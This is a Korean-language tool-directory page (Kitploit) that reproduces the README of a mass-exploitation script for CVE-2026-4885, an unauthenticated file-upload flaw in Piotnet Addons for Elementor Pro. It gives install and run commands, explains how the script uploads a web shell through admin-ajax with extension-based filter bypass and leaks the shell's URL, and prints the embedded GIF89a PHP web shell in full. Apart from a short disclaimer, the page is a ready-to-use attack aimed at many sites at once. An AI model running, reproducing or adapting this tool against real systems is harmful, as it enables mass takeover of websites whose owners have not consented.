Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-4885 — Piotnet Addons for Elementor Pro <= 7.1.70 - 인증되지 않은 임의 파일 업로드 (Form File Upload 경유) | Kitploit
도구/GitHubGitHub/jenderal92/cve-2026-4885
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubjenderal92/cve-2026-4885

CVE-2026-4885

Piotnet Addons for Elementor Pro <= 7.1.70 - 인증되지 않은 임의 파일 업로드 (Form File Upload 경유)

저장소 보기
2개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-4885 – Piotnet Addons for Elementor Pro 대량 익스플로잇

Piotnet Addons for Elementor Pro ≤ 7.1.70에서 인증되지 않은 임의 파일 업로드를 통한 원격 코드 실행(RCE)

이 도구는 대량 익스플로잇을 위해 설계되었습니다. 대상 목록을 입력하면 자동으로 다음 작업을 수행합니다:

  • 플러그인 버전 감지(또는 에셋이 발견되면 취약한 것으로 간주)
  • post_id, form_id, 올바른 업로드 필드 이름을 추출하기 위한 고급 정찰 수행
  • 여러 PHP 확장자(.phtml, .php3, .php4, .phps, .pht, .php2)를 시도하여 취약한 필터 우회
  • GIF89a 헤더 PHP 셸 업로드(내장, 외부 파일 불필요)
  • pafe_export_database를 통해 업로드된 셸 URL 누출
  • 셸 실행 확인(Logic_Internet 문자열 검색) 및 URL을 shells.txt에 저장

⚠️ 면책 조항
이 도구는 교육 및 공인된 보안 테스트 전용입니다.
소유하지 않은 시스템에 대한 무단 사용은 불법입니다.

더 많은 면책 조항은 Jenderal92의 표지에서 볼 수 있습니다. 여기에서 확인하세요!!!


기능

  • Python 2.7 호환(print/input을 조정하면 Python 3에서도 작동)
  • 멀티 스레드 – 최대 20개 대상을 동시에 스캔 및 익스플로잇
  • 스마트 폼 감지 – Piotnet 특정 HTML 속성(data-pafe-form-builder-field-name, data-elementor-id 등) 파싱
  • 외부 셸 파일 불필요 – PHP 페이로드가 스크립트에 내장됨
  • 자동 URL 스킴 – 누락된 경우 https:// 추가
  • 광범위한 경로 목록 – 22개의 일반적인 폼 URL 포함(/contact, /apply, /quote, /book-appointment, …)
  • 누출 패턴 – wp-content/uploads/piotnet-addons-for-elementor/ 및 직접 루트 경로 모두 매칭

요구 사항

  • Python 2.7(또는 약간의 수정을 거친 Python 3)
  • requests 라이브러리
root@kitploit:~
pip install requests

설치

root@kitploit:~
git clone https://github.com/Jenderal92/CVE-2026-4885.git
cd CVE-2026-4885

사용법

  1. 대상 파일 준비

targets.txt(또는 다른 이름)라는 파일을 만들고 각 줄에 URL 하나씩 입력합니다:

root@kitploit:~
https://example1.com
example2.com
http://vulnerable-site.org
  1. 익스플로잇 실행
root@kitploit:~
python2 CVE-2026-4885.py targets.txt

스크립트는 다음을 수행합니다:

· 각 대상에 대한 진행 상황 표시 · 성공한 셸 URL을 shells.txt에 저장

출력 예시

root@kitploit:~
[*] Loaded built-in shell (598 bytes)
[*] scanning 25 pages...
[+] found form at https://target.com/contact | post_id=13 form_id=fa2c60e field=file
[*] post_id=13 form_id=fa2c60e field=file
[*] trying .phtml
[+] uploaded .phtml
[+] shell URL: https://target.com/wp-content/uploads/piotnet-addons-for-elementor/xxx-6a11e162a6099.phtml
[+] SHELL UPLOADED -> https://target.com/wp-content/uploads/piotnet-addons-for-elementor/xxx-6a11e162a6099.phtml

명령줄 옵션(스크립트에서 사용자 지정 가능)

변수 설명 기본값 TIMEOUT HTTP 요청 시간 초과 10초 MAX_THREADS 동시 스레드 수 20 OUTPUT_FILE 성공한 셸 URL을 저장할 위치 shells.txt EXT_LIST 시도할 파일 확장자 .phtml, .php3, .php4, .phps, .pht, .php2

이 값들은 스크립트 상단을 편집하여 변경할 수 있습니다.


셸 페이로드

내장 셸은 다음과 같습니다:

root@kitploit:~
GIF89a;
<?php
echo 'Logic_Internet'.'<br>'.'Uname:'.php_uname().'<br>'.$cwd = getcwd();
Echo '<center>  <form method="post" target="_self" enctype="multipart/form-data">  <input type="file" size="20" name="uploads" /> <input type="submit" value="upload" />  </form>  </center>'.'<br>';
if (!empty ($_FILES['uploads'])) {
    move_uploaded_file($_FILES['uploads']['tmp_name'],$_FILES['uploads']['name']);
    Echo "<script>alert('upload Done');</script><b>Uploaded !!!</b><br>name : ".$_FILES['uploads']['name']."<br>size : ".$_FILES['uploads']['size']."<br>type : ".$_FILES['uploads']['type'];
}
?>

· 서버 정보, 현재 작업 디렉터리, 파일 업로드 양식을 표시합니다. · 다른 PHP 코드로 교체할 수 있습니다(스크립트의 SHELL_CODE만 변경하면 됩니다).


작동 방식

  1. 버전 감지 · 플러그인 에셋에서 홈페이지의 ?ver= 검색. · 알려진 CSS/JS 파일 존재 여부 확인으로 대체.
  2. 정찰 · 일반적인 폼 페이지와 홈페이지에서 발견된 모든 내부 링크를 크롤링. · Piotnet 특정 HTML 속성에서 post_id, form_id, 올바른 파일 업로드 필드 이름 추출.
  3. 업로드 · wp-admin/admin-ajax.php?action=pafe_ajax_form_builder로 multipart POST 요청 전송. · 플러그인의 업로드 메커니즘을 모방한 JSON 페이로드 사용. · 하나가 성공할 때까지 EXT_LIST의 모든 확장자 시도.
  4. 누출 · 업로드된 파일의 전체 URL이 포함된 CSV를 반환하는 pafe_export_database 요청. · xxx-{random}.ext 패턴과 일치하는 정규식을 사용하여 URL 파싱.
  5. 검증 · 누출된 URL 방문. · Logic_Internet 문자열 존재 확인. · 성공 시 URL을 shells.txt에 저장.

문제 해결

Windows에서 UnicodeEncodeError

스크립트에는 이미 비 ASCII 문자를 처리하는 safe_unicode() 함수가 포함되어 있습니다. 여전히 오류가 발생하면 터미널이 UTF-8을 지원하는지 확인하세요:

root@kitploit:~
chcp 65001

폼을 찾을 수 없음 / 모든 확장자 실패

· 대상이 패치되었거나 Piotnet Addons를 사용하지 않을 수 있습니다. · TIMEOUT 또는 MAX_THREADS를 늘려 보세요. · 플러그인이 실제로 설치되어 있는지 수동으로 확인하세요.

누출 실패하지만 업로드는 성공함

· pafe_export_database 엔드포인트가 비활성화되었거나 보호되고 있을 수 있습니다. · 브라우저에서 /wp-admin/admin-ajax.php?action=pafe_export_database에 수동으로 접근하여 접근 가능한지 확인해 보세요.


법적 및 윤리적 사용

· 서면 승인을 받은 시스템에서만 이 도구를 사용하세요. · 저자는 오용 또는 발생한 피해에 대해 책임을 지지 않습니다. · 모든 관련 법률을 준수하세요.

도구 다운로드